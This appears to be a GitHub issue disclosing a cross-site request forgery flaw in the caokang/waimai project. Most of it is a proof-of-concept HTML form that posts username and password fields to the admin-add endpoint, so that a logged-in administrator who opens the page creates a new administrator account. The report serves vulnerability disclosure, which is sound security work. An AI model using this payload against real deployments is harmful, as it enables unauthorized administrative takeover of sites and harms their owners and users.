There is a CSRF vulnerability that can add the administrator account

After the administrator logged in, open the following the page poc： csrf.html //add a admin

<html>
<form class="form-horizontal" role="form" action="http://www.waimai.com/admin.php?m=Member&a=adminaddsave" enctype="multipart/form-data" method="post">
<div class="form-group"><label class="col-sm-2 control-label" for="inputEmail3">用户名</label></div>
<div class="col-sm-4"><input name="username" class="form-control" id="inputEmail3" type="text" value=""></div>
<div class="col-sm-6"><span class="help-block"></span></div>
<div class="form-group"><label class="col-sm-2 control-label" for="inputPassword3">密码</label></div>
<div class="col-sm-4"><input name="password" class="form-control" id="inputEmail3" type="password" value=""></div>
<div class="col-sm-6"><span class="help-block"></span></div></div><div class="form-group"><label class="col-sm-2 control-label" for="inputPassword3">确认密码</label>
<div class="col-sm-4"><input name="repassword" class="form-control" id="inputEmail3" type="password" value=""></div>
<div class="col-sm-6"><span class="help-block"></span></div></div><hr><div class="form-group"><label class="col-sm-4 control-label" for="inputPassword3"></label><div class="col-sm-2"><button class="btn btn-primary" type="sumbit">保存</button></div>
<div class="col-sm-6"><span class="help-block"></span></div></div></form>

</html>

caokang / waimai

There is a CSRF vulnerability that can add the administrator account #2